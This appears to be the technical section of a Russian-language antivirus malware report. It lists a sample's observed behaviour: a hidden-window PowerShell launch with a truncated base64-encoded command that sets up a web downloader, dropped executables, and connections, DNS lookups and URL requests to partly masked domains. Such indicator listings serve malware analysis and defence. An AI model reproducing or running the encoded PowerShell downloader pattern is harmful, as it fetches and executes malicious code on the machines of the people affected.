Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABhAEEAQwBrADQAQQBEAGMAPQAoACcAawAnACsAJwB4AEIARABBACcAKwAnAEEAWAAnACkAOwAkAGgAQQBBAFEAUQAxAEEAQgA9AC4AKAAnAG4AJwArACcAZQAnACsAJwB3AC0AbwBiAGoAZQBjAHQAJwApACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1548
- %TEMP%\1132536.cvr
- %HOMEPATH%\392.exe
- %HOMEPATH%\392.exe
- 'ch####ngiovi.com':80
- 'ac###ytech.ca':443
- 'si#####esponsive.com':80
- 'de###ndunn.com':443
- 'si###atural.com':80
- http://ch####ngiovi.com/wp/O9I/
- http://si#####esponsive.com/samples/Vxfk/
- http://si###atural.com/tmp/kCK/
- http://si###atural.com/cgi-sys/suspendedpage.cgi
- 'ac###ytech.ca':443
- 'de###ndunn.com':443
- DNS ASK ca###asas.com
- DNS ASK ch####ngiovi.com
- DNS ASK ac###ytech.ca
- DNS ASK si#####esponsive.com
- DNS ASK de###ndunn.com
- DNS ASK si###atural.com
- DNS ASK he######yconjurodeamor.info
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABhAEEAQwBrADQAQQBEAGMAPQAoACcAawAnACsAJwB4AEIARABBACcAKwAnAEEAWAAnACkAOwAkAGgAQQBBAFEAUQAxAEEAQgA9AC4AKAAnAG4AJwArACcAZQAnACsAJwB3AC0AbwBiAGoAZQBjAHQAJwApACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG...' (со скрытым окном)